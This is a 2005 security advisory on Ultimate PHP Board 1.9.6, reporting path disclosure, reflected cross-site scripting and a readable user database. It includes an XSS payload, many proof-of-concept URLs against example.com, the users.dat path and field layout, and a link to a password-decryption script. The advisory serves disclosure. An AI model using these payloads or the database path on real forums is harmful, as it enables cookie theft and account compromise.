M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD
M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD
Published: 06 16 2005
Released: 06 16 2005
Name: Ultimate PHP Board (UPB)
Affected Systems: <= 1.9.6 GOLD
Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information
Disclosure
Author: Alberto Trivero
Vendor: http://www.myupb.com/ourscripts_upb.php
Software Description
***********
"UPB is a forum/message board script. It supports threaded discussion with a
comprehesive text database system that we wrote here at php outburst for the
backend."
Full Path Disclosure
*******
Thanks to an improper control of the value of some variables it's possible
to cause some errors and obtain the full path by sending simples requests
like these:
http://www.example.com/upb/viewtopic.php?id=0
http://www.example.com/upb/profile.php?action=get&id=0
http://www.example.com/upb/newpost.php?t_id=0
Cross-Site Scripting (XSS)
*******
Let's look at code from login.php at line 69:
<?
...
echo "<form action='login.php?ref=$ref&l=1' method=POST>
<center>$skin_tableheading
...
?>
The $rev parameter can be controlled by a remote user and when UPB get the
value don't sanitise properly it, so a malicious user can inject some HTML
code like this:
'><script>alert(document.cookie)</script>
that will change the HTML line in:
<form
action='login.php?ref='><script>alert(document.cookie)</script>&l=1'
method=POST>
executing the <script>...</script> tag that show, in this case, the cookies.
This is the PoC URL:
http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.co
okie)%3C/script%3E
Let's look now at code from viewtopic.php at line 13:
<?
...
$where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a>
<b>></b> $w_topic[subject]";
...
?>
We can notice in the $id parameter the same preceding problem explottable
with an URL like this:
http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document
.cookie)%3C/script%3E
These are other PoC URLs for other parameters:
http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E
http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.c
ookie)%3C/script%3E
http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.coo
kies)%3C/script%3E
http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E
http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E
http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(d
ocument.cookie)%3C/script%3E
Sensitive Information Disclosure
*********
In many cases (every time with non Apache webservers but some time also with
its) it's possible to obtain sensitives informations about all the users
registered on the UPB forum by surfing on this file:
http://www.example.com/upb/db/users.dat
and viewing informations structured in this way:
user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location<~>u
rl<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id
The passwords of users are crypted and for automate the decription I made a
code available at this address: http://albythebest.altervista.org/upb.pl
Solution
*********
The vendor has been contacted many times but a patch was not yet produced.
Alberto Trivero - trivero@xxxxxxxx
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group